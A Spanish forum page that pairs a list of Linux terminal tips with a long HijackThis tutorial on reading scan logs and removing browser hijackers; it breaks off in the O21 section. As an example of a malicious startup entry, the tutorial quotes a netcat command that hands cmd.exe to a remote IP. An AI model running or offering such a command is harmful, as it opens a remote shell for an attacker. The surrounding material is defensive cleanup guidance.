Aquí les dejo una lista de utilidades que se pueden hacer desde la terminal.

---

Averiguar IP Pública:

curl icanhazip.com

Si no tenemos instalado Curl:

sudo apt-get install curl

---

Cambiar página de inicio de Firefox:

sed -i 's|\("browser.startup.homepage",\) "\(.*\)"|\1 "http://google.com"|' .mozilla/firefox/*.default/prefs.js

Esto cambia la página principal de Firefox que tengas por la de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Simplemente modifica el archivo de preferencias que se encuentra en .mozilla/firefox/*.default/prefs.js.

---

Resolución mínima, máxima y actual de tu pantalla:

xrandr -q | grep -w Screen

Devuelve:

CitarScreen 0: minimum 320 x 240, current 1280 x 1024, maximum 1280 x 1024

---

Temperatura actual del procesador:

cat /proc/acpi/thermal_zone/THRM/temperature 

Si no funciona:

sudo aptitude install lm-sensors
sudo sensors-detect 
sensors

---

Información de CPU:

cat /proc/cpuinfo 

---

Eliminar pitido del sistema:

echo "blacklist pcspkr"|sudo tee -a /etc/modprobe.d/blacklist.conf
sudo modprobe -r pcspkr

Es el sonido que suena al intentar eliminar caracteres que no hay en la terminal o al intentar completar un comando con una tabulación.

---

Ubuntu 32 o 64 bytes:

uname -m

Devuelve:

• i686: tenemos  la versión de 32 bits.
• x86_64: tenemos  la versión de 64 bits.

---

Deshabilitar respuesta a paquetes ICMP:

sudo -s "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Habilitar respuesta a paquetes ICMP:

sudo -s "echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

---

Renovar dirección IP asignada mediante DHCP:

sudo dhclient -r
sudo dhclient eth0
sudo dhclient wlan0

---

Cambiar MAC con Macchanger:

sudo apt-get install macchanger
macchanger XX:XX:XX:XX:XX:XX dispositivo

---

Si tenes otro, compartilo!

1. ¿Qué es Hijackthis y para qué nos sirve?
2. Instalación de Hijackthis y otras herramientas a utilizar.
3. Sacando nuestro Log.
4. Analizando logs.
5. Solucionando problemas.

---

1. ¿Qué es Hijackthis?
Es una pequeña herramienta que nos permite detectar y, eventualmente, eliminar las modificaciones hechas por Browsers hijackers tales como: "Toolbars, Páginas de Inicio, Páginas de búsqueda,capturadores de IE,etc.".
Cabe aclarar que no todo lo que nos muestra(Hijackthis) en el log es malo, por lo tanto hay que tener mucho cuidado con lo que borramos del log de Hijackthis.

---

2. Instalación y ejecución de Hijackthis.
Lo primero que debemos hacer, es bajarnos la nueva versión: HijackThis 2.0.2(u otra versión, funciona igual) lo podéis descargar de: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Una vez descargado y con todos los programas cerrados procedemos a ejecutar la nueva instalación automatizada que no traían versiones anteriores.
Elegimos la ruta de instalación y aceptamos el contrato. Automáticamente se abrirá Hijackthis y se añadirá un icono de acceso directo en nuestro escritorio.
Después de esta secuencia de pasos, se verá una imagen así:

---

3. Sacando nuestro log de Hijackthis.
Como vemos en la imagen de más arriba, sólo nos queda hacer un paso más:
Hacer click en el botón: Do a system scan and save a logfile(que más o menos, significa: Escanear el sistema y guardar un archivo de log, que puede servir para publicarlo en algún foro o como copia de seguridad en otra situación).
Bueno, esperamos que se realice el escaneo del sistema y el hijackthis mostrará algo como esto:


A continuación analizaremos su salida.

---

4. Analizando el log de Hijackthis.
Procederé a detallar las componentes que conforman el log de Hijackthis y luego los explicaré brevemente.
Estos son:
R0, R1, R2, R3: las URL de paginas de inicio/búsqueda  en el Internet Explorer.

F0, F1, F2, F3: Programas cargados a partir de ficheros  *.ini (system.ini, win.ini)

N1, N2, N3, N4: las URL de paginas de inicio/búsqueda de Netscape o Firefox.

O1: Redirecciones mediante aviso del fichero HOSTS.

O2: BHO (Browser Help Object); Son plugins para aumentar la funcionalidad de Internet, pero también pueden ser spywares.

O3: Toolbars del IE. (Internet Explorer).

O4: Aplicaciones que cargan en el inicio automático de Windows, ya sea desde el registro o desde la carpeta Inicio.

O5: Son las opciones de IE no visibles desde el panel de control de Windows.

O6: Acceso restringido por el Administrador a las opciones de IE.

O7: Acceso restringido por el Administrador al Registro.

O8: Elementos encontrados en el menú contextual del IE.

O9: Botones adicionales que se encuentran en la barra de herramientas de IE. Ej. : Flasget, DAP, Encarta, etc.

O10: Winsock Hijackers.

O11: Adición de un grupo extra en las opciones avanzadas de IE.

O12: Plugins para IE.

O13: Hijack del prefijo en IE.

O14: Hijack de la configuración por defecto del IE.

O15: Sitios no autorizados en la zona segura configurada por IE.

O16: Objetos ActiveX.

O17: Hijack del Dominio / You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

O18: Protocolos extra / Hijack de estos.

O19: Hijack de la hoja de estilo del Usuario

O20: Valores del registro auto ejecutables AppInit_DLLs.

O21: Llaves del registro auto ejecutables ShellServiceObjectDelayLoad.

O22: Llaves del registro auto ejecutables SharedTaskSheduler.

O23: Servicios.

Aquí, están detallados cada uno de los componentes. Ahora veremos, como podemos corregir algún problema a raíz de lectura de estos indicadores.

5. Solucionando problemas del sistema con Hijackthis.

Grupo de R0, R1, R2, R3.
En este caso, si las URL que aparecen aquí han sido configuradas por nosotros no habrá problema y las dejamos como están.
Pero, si estas no han sido puestas por nosotros, tienen direcciones muy extensas y no las conocemos la marcamos y damos a Fix Checked.

Ejemplo Bueno:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = www.google.com.ar

Ejemplo Malo:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Search Bar =  res://C:\WINDOWS\TEMP\se.dll/sp.html

NOTA: R2, ya no es utilizado.

Siguiendo con R3:
R3 es la referencia usada por Search Hook. Si introducimos manualmente una URL como pagina de inicio sin especificar un protocolo (http: //, ftp://) el navegador tratara de encontrar uno automático y en caso de que no lo logre, acudirá a URL Search Hook.

Ejemplo Bueno:
R3 - Default URLSearchHook is missing

Ejemplo Malo, marcar y dar a 'Fix Checked'

R3 - URLSearchHook: (no name) - _ {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)

---

Grupo F0, F1, F2, F3.
Aquí encontramos programas cargados a partir de ficheros *.ini (win.ini, system.ini).

F0: Según las fuentes que he consultado es recomendable que si se encuentra una línea que comience con F0, marcarla y darle a continuación a Fix Checked.

F1: Programas antiguos utilizados por Win 3.1/95/98 que viene adjuntado en el archivo win.ini en las claves Run= y Load=. En este caso debemos buscar información antes de marcar y dar a Fix Checked.

F2 y F3: Son lo mismo que los anteriores, pero usan el núcleo NT, estoy hablando de Windows NT/2000/XP, que no usan del mismo modo a los archivos de inicio: system.ini y win.ini ya nombrados anteriormente.
Algunos ejemplos de referencia:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe

Si bajo Win NT encuentran el valor por defecto: userinit,nddeagnt.exe, es normal bajo ese sistema. Pero cualquier otro ejecutable es altamente probable que se trate de spyware y/o troyano.

---

Grupo N1, N2, N3, N4.

URL's de páginas de inicio/búsqueda en Netscape/Mozilla.

N1: Se refiere a la página de inicio y motor de búsqueda de Netscape 4
N2: Se refiere a la página de inicio y motor de búsqueda de netscape 6
N3: Se refiere a la página de inicio y motor de búsqueda de Netscape 7.
N4: Corresponde a la página de inicio y motor de búsqueda de Mozilla Firefox.

Se encuentran comúnmente en los archivos : prefs.js.

NOTA:
Actualmente el mayor porcentaje de spywares, malwares, Hijackers están hechos para IE y no para Mozilla,Netscape o Opera, por lo qué estos se mantienen un poco más a salvo que el IE mencionado anteriormente.

---

Grupo O1:
Corresponde al redireccionamiento del archivo Hosts.

Qué hace el archivo Hosts?.
El archivo Hosts, funciona como una especie de convertidor o el encargado de establecer las relaciones entre Dirección IP y Hostnames.

127.0.0.1 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si tratas de ir a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, revisará el archivo hosts, verá la entrada y la convertirá a la dirección IP 127.0.0.1.
En este cuadro, verás las rutas de instalación por defecto del archivo Hosts:

   
Si ves entradas como las mostradas arriba y no hay una razón específica por la cuál sepas que deban estar ahí, puedes borrarlas con seguridad.

Si ves que el archivo hosts está localizado en C:\Windows\Help\hosts, eso significa que estás infectado con el CoolWebSearch. Si notas que el archivo hosts no está en su ruta por defecto de tu sistema operativo entonces, en el escaneo de Hijackthis, marca la entrada y dale Fix Checked u otro programa que limpie el archivo Hosts.

Si no eres un usuario muy avanzado en Hijackthis y no quieres complicarte, puedes usar el programa Hoster, el cual permite restaurar el archivo hosts a su configuración por defecto en tu sistema.
Para hacer esto, baja el programa Hoster desde aquí : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Ejecútalo, una vez abierto, pulsa en el botón "Restore Original Host" y una vez hecho esto cierra el Hoster.

---

Grupo O2:
Este grupo, pertenece a los Browser Helper Objects ( BHO, para traducción, Google ).

Ejemplo de BHO Real:

BHO: NAV Helper - - C:\Program Files\Norton Antivirus\NavShExt.dll

Para arreglar este tipo de entradas, podemos consultar una lista como ésta, alojada en Sysinfo. Se puede consultar aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cuando estemos consultando la lista, debemos hacer énfasis en el CLSID, que es el número entre las claves en la lista. El CLSID en el listado hacen referencias a entradas del registro que contienen información acerca de los BHO.

Una vez, detectadas las entradas malignas procederemos a marcarlas y darle "Fix Checked". Pero, en ese momento Hijackthis querrá cerrarlas al instante y no podrá hacerlo, ya que estarán en uso.
En este caso lo que deberemos hacer es entrar en modo Seguro con la tecla F8 antes que inicie el sistema y borrarlo manualmente.

---

Grupo O3:
Este grupo corresponde a las barras de herramientas de Internet Explorer.
Éstas son las famosas " Toolbars", que se encuentran debajo de la barra de navegación o el menú contextual de IE.

Éstas se encuentran en la siguiente llave del registro:

HKLM\SOFTWARE\Microsoft\Intenet Explorer\Toolbar

Ejemplo:

Toolbar: Norton Antivirus - - C:\Program Files\Norton Antivirus\NavShExt.dll

Si estas entradas, no están aceptadas por ti o no reconoces sus nombres puedes consultar la lista de Sysinfo que está en el grupo anterior, para encontrar la entrada y ver si sirve en tu sistema o no. Si es algo que no quieras en tu sistema, puedes borrarlo con tranquilidad, como antes lo hacíamos: Marcando la entrada y clic en Fix Checked.
En este grupo, sucede lo mismo que en el grupo anterior. Hijackthis intentará borrar las entradas seleccionadas pero no será posible borrar algunas, tendrás qué entrar en modo seguro para borrarlas manualmente.

---

Grupo O4:
A este grupo, le corresponde a los programas o aplicaciones que se inician con Windows cuando encendemos nuestro sistema.
Comúnmente se encuentran en las llaves del registro y las carpetas Inicio. Esto sólo es válido para NT, XP y 2000.

- Las llaves del registro, donde se pueden alojar estas aplicaciones son estas:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

NOTA: HKLM = HKEY_LOCAL_MACHINE – HKCU = HKEY_CURRENT_USER.

Se pueden distinguir dos carpetas donde se pueden iniciar las aplicaciones:

Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> Usuario en particular.
Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup - > Apunta a todos los usuarios.

Cuando arreglas las entradas O4, HijackThis no borrará los archivos asociados con esta entrada. Deberás borrarlos manualmente, usualmente reiniciando lo máquina y entrando en modo seguro. Las entradas Global Startup y Startup trabajan un poco diferente. HijackThis borrará los accesos directos en esas entradas, pero no los archivos a los que apuntan. Si un ejecutable actual reside en los directorios Global Startup o Startup entonces será borrado.

Ejemplo de aplicación legítima:

HKLM\...\Run: [winamp] "C:\Winamp\winamp.exe" / (puede ir algún argumento)

Posible ejemplo de aplicación maliciosa:

HKLM\...\Run : [**] "nc –vv 210.x.x.x –e cmd.exe"

Puedes consultar algunas de estas listas de Startups legítimos para poder consultar tu Log y ver si las aplicaciones que inician con tu sistema son verdaderas o en un peor caso: troyanos, spywares o hijackers.
Estas listas te pueden servir:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Grupo O5:
Este grupo corresponde a no poder acceder a las opciones de IE desde el Panel de Control.
Agregando una entrada dentro del archivo control.ini, que por defecto, se debería encontrar en "C:\Windows\control.ini". Modificando este archivo, podemos especificar los paneles de control que no deseemos que sean visibles.

Ejemplo: Archivo: control.ini: inet.cpl=no. Esto oculta las opciones de IE en el Panel de Control.

Si en el Log, encuentras una línea como esta y no esta puesta por ti o por otra persona de tu confianza o qué maneje el sistema, es signo de que una aplicación maliciosa esta intentando bloquear o dificultar la modificación de las opciones de IE. También puede ser una restricción puesta por algún software Anti-Spyware como SpyBot o Adware, en este último caso puedes dejarlo con tranquilidad, de lo contrario puedes utilizar Hijackthis para corregirlo.

---

Grupo O6:
Esta sección corresponde a una restricción, por parte del administrador, de hacer cambios en las opciones o en la página de inicio del Internet Explorer por medio de ciertas configuraciones en el registro.

Ejemplo :-

HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions

Estas opciones sólo son bloqueadas si el administrador lo ha hecho o por casualidado  o por uso personal se ha activado la función de Bloquear las opciones de IE desde el panel "Inmunizar" del software antispyware SpyBot: Search & Destroy.

---

Grupo 07:
Esta sección corresponde a que el Regedit no puede ser ejecutado debido al cambio de una entrada en el registro.

Llave del Registro:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

Ejemplo de Lista O7 -

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1

NOTA: En algunos casos, los administradores de determinados lugares, como cyber, empresas u otros sitios, bloquean el acceso al regedit para que no se modifique alguna configuración. Pero al ver esto, en tu sistema y no fue puesto por tí, puedes usar Hijackthis para borrarlo con tranquilidad.

---

Grupo 08:
Este grupo corresponde a los objetos extras encontrados en el Menú Contextual del Internet Explorer.

Esto significa que verás las opciones que normalmente ves cuando das click derecho en alguna página web que estés viendo en tu navegador.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

Ejemplo de Lista O8 -

Extra context menu item: &Google Search -
res://c:\windows\GoogleToolbar1.dll/cmsearch.html

El listado para estas entradas mostrará los objetos que aparecen en el menú contextual cuando das click derecho, y qué programa es usado cuando das click en esa opción. Algunas, como "Browser Pal" deberían ser borradas siempre, y el resto deberías buscarlas en Google antes de hacer cualquier cosa. Un ejemplo de un programa legítimo que podríamos encontrar ahí sería la Google Toolbar.

Cuando arregles este tipo de entradas, HijackThis no borrará los archivos que vienen mencionados en la lista. Es recomendable que reinicies en modo seguro como en casos anteriores y borres esos archivos y/o carpetas de la toolbar mencionada.

---

Grupo 09:
Este grupo, corresponde a los botones que tenemos en la barra de herramientas principal del IE o a los objetos (ítems) en el menú Herramientas del IE que no son parte de la instalación por defecto.

Llave del Registro: HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensiones

Ejemplo de la Lista O9 -

Extra Button: AIM (HKLM)

Si no necesitas estos botones o los ítems del menú o los reconoces como malwares, puedes arreglarlas con seguridad.
Lo mismo que pasa en los grupos anteriores, Hijackthis no podrá borrar los archivos mencionados desde aquí, sino, qué tendrás que reiniciar y entrar en modo seguro para eliminar manualmente las carpetas y/o archivos maliciosos.

---

Grupo 10:
Este grupo, corresponde a los Hijackers del Winsock, también conocidos como LSP (Layered Service Provider). Los LSPs son una manera de unir un software a tu implementación Winsock 2 en tu computadora. Desde que los LSPs están encadenados, cuando el Winsock es usado, los datos también son transportados a través de cada LSP en la cadena. Los spywares y hijackers pueden usar los LSPs para ver todo el tráfico que se genera en tu conexión a Internet.

Ten cuidado, a la hora de remover estos objetos, ya qué si se eliminan de forma incorrecta, podrías perder el acceso a Internet.

Ejemplo de la Lista O10 -

Broken Internet access because of LSP provider 'spsublsp.dll' missing

Muchos escaneadores de virus empiezan a escanear virus, troyanos, etc., al nivel del Winsock. El problema es que muchos de ellos no reordenan los LSPs en el orden correcto después de borrar el LSP problemático. Esto puede causar que HijackThis vea un problema y muestre una advertencia, la cuál puede ser similar al ejemplo de arriba, aunque de hecho el Internet sigue trabajando. Deberías consultar a un experto cuando arregles estos errores. También puedes usar LSPFix para arreglar esto.
El SpyBot por lo general,  puede arreglar esto pero asegúrate de que tienes la última versión, ya que las antiguas tienen problemas.
Si no eres, un usuario muy avanzado con Hijackthis puedes utilizar una herramienta para reparar estos errores llamada: LSPFix (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login).
Aquí pongo una lista, para poder verificar si estas entradas son legítimas o no:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Grupo 11:
Este grupo, corresponde a una grupo de opciones no por defecto que han sido agregadas en la pestaña de Opciones Avanzadas de Opciones de Internet en el Internet Explorer.

Si buscas por el menú de Herramientas >> Opciones de Internet verás la pestaña Opciones Avanzadas. Es posible que aparezca ahí un nuevo grupo de opciones agregando una entrada bajo una llave del registro.

LLave del Registro: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions

Ejemplo de la Lista O11 -

Options group: [CommonName] CommonName

Esto lo saqué del manual que leí, cito textual: "De acuerdo con Merijn, creador de HijackThis (y también de CWShredder, StartupList, etc.), sólo se conoce de la existencia de un hijacker que usa esto y es el CommonName. Si ves CommonName en la lista, puedes removerlo con seguridad. Si ves otra entrada deberías usar Google para investigar un poco."

---

Grupo 12:
Este grupo, corresponde a los Plug-ins o addons para Internet Explorer. Los Plug-ins o addons son piezas de software que se cargan cuando el Internet Explorer inicia, para agregarle funcionabilidad al navegador. Existen muchos plug-ins legítimos y a su vez ilegítimos disponibles como por ejemplo el visor de archivos PDF(legítimo).

Llave del Registro: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins

Ejemplo de la Lista O12: Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll

Muchos de los plug-ins son legítimos, así que deberías investigar con Google, antes de llegar a la conclusión de borrarlo.
Uno de los más conocidos plug-ins ilegítimos es el Onflow, que tiene extensión .OFB.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo 13:
Este grupo, corresponde a un hijacker del prefijo por defecto del Internet Explorer. El prefijo por defecto es una configuración en Windows que especifíca como URLs aquello que escribas sin anteponer http://, ftp://, etc. que son manejados. Por defecto Windows agrega http:// al principio, como el prefijo por defecto. Es posible cambiar este prefijo por defecto por uno de tu elección editando el registro. El hijacker conocido como CoolWebSearch hace esto cambiando el prefijo por defecto a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login?. Eso significa que cuando te conectes a una URL, como You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, en realidad irás a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el cuál es en realidad el sitio web para CoolWebSearch.

Llave del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\

Ejemplo de Lista O13 - WWW. Prefix: http://ehttp.cc/?

Si estás experimentando problemas similares al problema de arriba, deberías correr CWShredder. Este programa remueve todas las variaciones conocidas de CoolWebSearch que puedan estar en tu máquina.

Si CWShredder no encuentra o arregla el problema, entonces puedes usar el HijackThis para arreglar esta entrada cuando la encuentres.

---

Grupo O14
Este grupo, corresponde al hijacker del "Reset Web Settings" (Reseteo de las Configuraciones Web). Hay un fichero en tu computadora que usa IE(Internet Explorer) cuando reseteas las opciones a las que venían por defecto. Ese fichero está guardado por defecto en C:\Windows\inf\iereset.inf y contiene todas las configuraciones por defecto que serán usadas. Cuando reseteas una configuración, se leerá el fichero y cambiará las configuraciones que estén en el archivo. Si un hijacker cambia la información en ese fichero, entonces te estarás reinfectando cuando resetees las configuraciones, porque leerá la información incorrecta del fichero iereset.inf.

Ejemplo de Lista O14 - IERESET.INF: START_PAGE_URL=http://www.searchalot.com

En conclusión, si ves una entrada de este tipo en tu log, no siempre quiere decir que sea mala. Puede ser puesta por tí, algún administrador del equipo, lo debes dejar siempre y cuando, conozcas la dirección del archivo. Por el contrario, si la desconoses, puedes marcarla y darle Fix Checked.

---

Grupo O15.
Este grupo, corresponde con los sitios indeseados en la "Zona de Sitios de Confianza" de IE. La seguridad de Internet Explorer está basada en un conjunto de zonas. Cada zona tiene diferente nivel de seguridad en términos de scripts y aplicaciones que pueden corre mientras se está usando esa zona. Es posible agregar dominios a zonas particulares, así que si estás navegando en un dominio que es parte de una zona de baja seguridad, entonces permitirás que se ejecuten scripts, algunos potencialmente peligrosos, de algún sitio web.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

Ejemplo de Lista O15 - Trusted Zone: http://www.arwinianos.net

Entonces, si vemos alguna entrada que desconocemos su procedencia o URL, procederemos a marcarla y darle Fix Checked.

---

Grupo O16.
Este grupo, corresponde a los objetos ActiveX, también conocidos como Downloaded Program Files (Archivos de Programa Descargados).

Los objetos ActiveX son programas que son descargados desde sitios web y son guardados en tu ordenador. Estos objetos están guardados por defecto en: C:\windows\Downloaded Program Files. Estos tienen una referencia en el registro por su CLSID el cuál es una cadena larga de números entre llaves {}. Existen muchos controles ActiveX legítimos como este de ejemplo, el cuál es un visor iPix.

Ejemplo de Lista O16 - DPF: (iPix ActiveX Control) - http://www.ipix.com/download/ipixx.cab

O algún Activex, para jugar algún juego online.
Muchos son legítimos, pero también lo hay para ser usado con otras intenciones.

Si ves nombres o direcciones que no reconozcas, deberías buscar en Google para ver si son o no legítimos. Si confirmas que son ilegítimas, puedes arreglarlas. Borrando los objetos ActiveX de tu computadora, no tendrás mayor problema que descargarlos nuevamente cuando entres de nuevo a la página desde donde los descargaste.
Como ya dijimos más arriba, no todos los Activex, son ilegítimos. Muchos de estos son utilizados por sitios web autorizados que permiten acceder a ciertas funciones que no se permiten sin el objeto Activex.
Por ejemplo:
Cualquier AV online, como Eset, Kaspersky necesitan de un Activex para poder ejecutarse y ver el contenido de tus ficheros para poder analizarlos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo O17.
Este grupo corresponde al dominio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Cuando nos dirijimos a un sitio web usando un dominio, como You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, en lugar de una dirección IP, tu computadora usa un servidor DNS para transformar el nombre de dominio en una dirección IP parecida a 200.56.15.85. El hackeo de dominios sucede cuando el hijacker cambia los servidores DNS en tu máquina para poder apuntar tus DNS a donde ellos quieran para poder dirijirte a cualquier sitio que quieran. Agregando You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a sus servidores DNS, ellos pueden hacer que cuando vayas a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, te redirijan al sitio de su elección, por ejemplo, un sitio que descargue más malware a tu ordenador o te infecte con algún troyano.

Ejemplo de Lista O17 - HKLM\System\CS1\Services\VxD\MSTCP: NameServer = 69.57.146.14,69.57.147.175

Si ves entradas de este tipo y no reconoces el dominio perteneciente a tu ISP o la compañía que te proporciona conexión a Internet, y los servidores DNS no pertenecen a tu ISP o compañía, entonces deberías usar HijackThis para arreglar esto.
En otro caso, podrías hacer un Whois a la dirección IP para ver a que compañía pertenecen.

---

Grupo O18.
Este grupo corresponde a los protocolos extra y protocolos de hijackers.

Este método es usado para cambiar los controladores de protocolo estándar que tu computadora usa a otros que el hijacker proporciona. Esto permite al hijacker tomar control de ciertos canales en que tu computadora envía y recibe información.

Llaves del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter

HijackThis primero lee la sección de protocolos del registro en busca de protocolos no-estándar. Cuando encuentra uno muestra el CLSID para mayor información así como la ruta del archivo.

Ejemplo de Lista O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll

Los más comunes que hacen esto son CoolWebSearch, Related Links, y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Si ves estos nombres puedes arreglarlos con HijackThis.
Usa Google para investigar si los archivos son legítimos. También puedes usar la Lista O18 de Castlecops como apoyo para verificar los archivos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo O19.
Este grupo corresponde al hijacker de las hojas de estilo del usuario.

Una hoja de estilo es una plantilla para saber cómo mostrar las capas, colores y fuentes que se visualizan en una página HTML. Este tipo de hijacking sobreescribe la hoja de estilo por defecto, la cuál fue diseñada para ayudar a los usuarios, y provoca largas cantidades de pop-ups (ventanas emergentes de publicidad) ya sea para causar SPAM, molestia o una lentitud potencial.

Llaves del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\: User Stylesheets

Ejemplo de Lista O19 - User style sheet: c:\WINDOWS\Java\my.css

Por lo general, estas entradas se pueden reparar con Hijackthis sin mayores problemas.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo O20.
Este grupo, corresponde a los archivos que se cargan a través del valor del registro AppInit_DLLs.

El valor del registro AppInitDLLs contiene una lista de dlls (librerías) que se cargarán cuando user32.dll está cargando. Muchos ejecutables de Windows usan la librería user32.dll, lo que significa que cualquier DLL que esté listada en la llave del registro AppInit_DLLs también será cargada. Esto hace que sea muy difícil remover la DLL ya que estará cargando con múltiples procesos, muchos de los cuales no pueden ser detenidos sin causar inestabilidad en el sistema. El archivo user32.dll también es usado en procesos que inician automáticamente por el sistema cuando tu te logueas. Esto significa que los archivos cargados en el valor AppInit_DLLs serán cargados casi al inicio en la rutina de arranque de Windows permitiendo a la DLL esconderse o protegerse a sí misma antes que tengamos acceso al sistema.

Este método es conocido al ser usado por una variante de CoolWebSearch y sólo puede verse en Regedit dando click derecho sobre el valor, y seleccionando Modificar dato binario. Registrar Lite , por otra parte, puede ver más fácil esta DLL.

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

Ejemplo de Lista O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll

Existen muy pocos programas legítimos que usan esta llave del registro, pero debes proceder con cuidado cuando decidas borrar los archivos que son listados aquí. Usa Google o alguna lista(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) como soporte para investigar si los archivos son legítimos o no.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo O21.
Este grupo, corresponde a los archivos que se cargan a través de la llave del registro ShellServiceObjectDelayLoad.

Esta llave contiene valores similares a los de la llave Run del registro. La diferencia es que ésa en lugar de apuntar al archivo mismo, ésta señala al InProcServer del CLSID, el cuál contiene la información acerca del DLL en particular que se está usando.

Los archivos bajo esta llave son cargados automáticamente por Explorer.exe cuando tu computadora inicia. Como Explorer.exe es la shell para tu computadora, ésta siempre se va a cargar, así también cargando los archivos bajo esta llave. Estos archivos son por lo tanto cargados tempranamente en el proceso de inicio antes de que ocurra cualquier intervención humana.

Un hijacker que usa el método puede reconocerse por las siguientes entradas:

Ejemplo de Lista: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = C:\WINDOWS\secure.html

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

